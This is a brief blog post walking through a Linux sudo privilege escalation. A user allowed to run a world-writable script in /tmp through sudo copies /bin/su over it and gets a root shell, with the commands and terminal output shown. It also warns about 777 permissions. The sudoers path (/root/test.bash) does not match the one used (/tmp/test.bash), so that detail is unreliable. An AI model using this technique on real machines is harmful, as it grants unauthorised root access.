A dirty privilege escalation trick


A while ago a colleague of mine showed me a quick and dirty privilege escalation trick exploiting which a user could grant itself root access to a machine.

I felt somewhat inclined to share the trick!

Here is the scenario:

I have a user named sahil on a linux machine and has been granted sudo access to a script /tmp/test.bash. the script is just a text file.

Here's the /etc/sudoers entry for the user.

[root@still ~]# grep sahil /etc/sudoers
sahil   ALL=(root)      NOPASSWD: /root/test.bash
[root@still ~]#

If I login as the user and check it's rights via sudo -l I get the expected result.

[sahil@still ~]$ sudo -l
Matching Defaults entries for sahil on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User sahil may run the following commands on this host:
    (root) NOPASSWD: /root/test.bash


So without any additional access when I try to switch to root I can't as shown below:

[sahil@still ~]$ sudo su
[sudo] password for sahil:
Sorry, user sahil is not allowed to execute '/bin/su' as root on still.
[sahil@still ~]$

But I can run the script.

[sahil@still ~]$ sudo /tmp/test.bash
This is a test script
[sahil@still ~]$


The script is in /tmp which is accessible to every user and the script has permissions of 777 set which is never a good thing. Here's an example why.

Now as the user sahil I'll copy the su binary as the script name in /tmp.

[sahil@still ~]$ which su
/bin/su
[sahil@still ~]$ cp /bin/su /tmp/test.bash

Now when I run the script:

[sahil@still ~]$ sudo /tmp/test.bash
[root@still sahil]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@still sahil]#

The user sahil waa able to successfully switch to root user!

No comments:

Powered by Blogger.